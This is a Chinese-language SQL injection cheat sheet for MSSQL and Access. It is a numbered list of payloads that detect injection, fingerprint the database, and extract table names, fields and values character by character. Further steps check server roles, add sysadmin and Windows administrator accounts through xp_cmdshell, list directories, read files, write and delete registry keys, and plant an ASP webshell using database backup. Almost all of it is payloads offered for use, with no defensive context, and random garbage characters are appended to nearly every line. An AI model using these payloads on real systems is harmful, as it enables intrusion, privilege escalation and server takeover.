1.判断是否有注入;and 1=1 ;and 1=2 �I(Qz%/�Ox
2.初步判断是否是mssql ;and user>0 ZY�8w�1:'
!uo�T8BBAk
3.注入参数是字符'and [查询条件] and ''=' �I eJI-lo�
R:+'"dBge�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' >DUTmJxv�
m�9�4PFD@N
5.判断数据库系统 m�I5J]�hk
�Z1jxu;O(�
;and (select count(*) from sysobjects)>0 mssql ii�_k�gqT^
�IA<>��+NS
;and (select count(*) from msysobjects)>0 access =^GP�Q�_"
��]\�KVA)\
SzIzQ�R93&
�:Fm�*WqZu
6.猜数据库 ;and (select Count(*) from [数据库名])>0 PDP�K�|FU�
P)��)B�S�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �p5$�}h�,7
[.^��ol6��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 &9��^4-�5]
Pc*l�Ho�VL
9.(1)猜字段的ascii值(access) S't��9�F
}�ymW};��W
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 "�5L?RkFi\
�>t.���Lc.
(2)猜字段的ascii值(mssql) {?`7D�:]`^
=y-�yHRC7�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 .SjJG67OyA
F \ls]�luN
10.测试权限结构(mssql) ]:#�=[�CH�
�J�/�jk�b3
\?]U*)B.�r
)�2RRa�^=&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ���cz,QP'g
]7��Du�/)$
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Cyd�/HTNh<
]}PX��N1(�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- pH�m�qwB~|
;���YR��/7
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Gn��=b�_�!
4P�[Mk�MoC
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �k�Bhj�qI*
u�{_,�S3Aa
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- {daX?�N|�V
��#�%Bt!#�
;and 1=(select IS_MEMBER('db_owner'));-- ?[d4HKs�
>({qg��zV`
m�_*wqNFA6
�z`IW[N7Z�
11.添加mssql和系统的帐户 :Bmn<2[Y;�
[:�{
FR2*x
;exec master.dbo.sp_addlogin username;-- �,IyQmN� y
;exec master.dbo.sp_password null,username,password;-- (�ne[�a2%>
a51e~mg Z`
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- F�$�)l8�}�
2PYn��zAsl
;exec master.dbo.xp_cmdshell 'net user username password ;O%�
H]oN�
�V\��Gs&>
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- @JXpD8jn
��z'm�}�p
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��UP^8Yhdo
Ny2
�Z
<TW
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��_i {Y0d+
b�'\Q/;oz>
Q3ty�K�{JE
y<kUG�sD��
12.(1)遍历目录 &'$Bk5�D@G
,Q56A#Y��\
;create table dirs(paths varchar(100), id int) @KK6Jy�OTQ
�U}�5f�jY�
;insert dirs exec master.dbo.xp_dirtree 'c:\' =�}#�yi<Lt
JY��2<�ECO
;and (select top 1 paths from dirs)>0 T4��]���2R
F*[�E28ia&
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) B^/MwD>�%
#zTy7ZS,0
)�:'wxIVGI
8�6OrJdD�8
(2)遍历目录 �-y-�}g�[`
3�A!a7]�fW
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- gZ4'
w`4r
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 sN�Do@�u�7
fgd2jr��3T
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 x�|a&wC2,{
V�kFh(Br<{
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 4%J�0e'i�N
;&&<zWq�3h
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �KM��w�V;r
D+3��?�p��
rS_�G;�}Zr
2�{&A)Z!I
13.mssql中的存储过程 rP4T;Clout
@4*:q�j�?�
xp_regenumvalues 注册表根键, 子键 U`�q��keNd
Mpoj�absh
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 p
q�z~9y~�
Uw("+[�5O0
xp_regread 根键,子键,键值名 �M!J7Vj?Ps
+�
�f6�7y
;exec xp_regread ri{*�\LV*@
T�I D�g�IK
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 vW=�-�RTRH
�Qp:I[:Lr;
xp_regwrite 根键,子键, 值名, 值类型, 值 h.�X4x2�(.
Jj\4P1|'�7
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 euB�1�}M�
H7X-\K� 1w
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 $\�BYN�=�#
@�!P�2f�
�
xp_regdeletevalue 根键,子键,值名 <2U@O`
g�C
Y�/5M)AyJt
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 6Cj7 =|L�7
2'?'df�j�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 23)�:OB>S`
!��G3AD3�
,�G�H`�tK_
n�{;Q"\*Sg
14.mssql的backup创建webshell J#..xJ?XRD
�;\*3A22 #
use model 8:{�id>Mm^
77@N79lqO
create table cmd(str image); GM6,�Lz�H�
�ELCNf��
insert into cmd(str) values (''); J 6KHc^,7�
*�DPX4��P
backup database model to disk='c:\l.asp'; 8 ?�?-H0�P
��a&_���h(
G\�gjCp?!
TN0K�S]^A3
15.mssql内置函数 �rM7�q�Bt�
I�_<VGU��k
;and (select @@version)>0 获得Windows的版本号 6j�(/uF4!#
vU�pAW[[��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ����^!1!l-
">b�hxXeiN
;and (select user_name())>0 爆当前系统的连接用户 ZIx-�mC5��
z���Tg\\z;
;and (select db_name())>0 得到当前连接的数据库 XZI�apT���
'|Ic�L1c=I
(!nk�v��^]
����yNn�s6
16.简洁的webshell �}YD�i/�b7
5tl�R��rf
use model �3IMvt�g��
[�
\_�o_W�
create table cmd(str image); L�0wT��:x*
�^o3,���YH
insert into cmd(str) values (''); >38>R0�k35
|R9�Lben',
backup database model to disk='g:\wwwtest\l.asp';
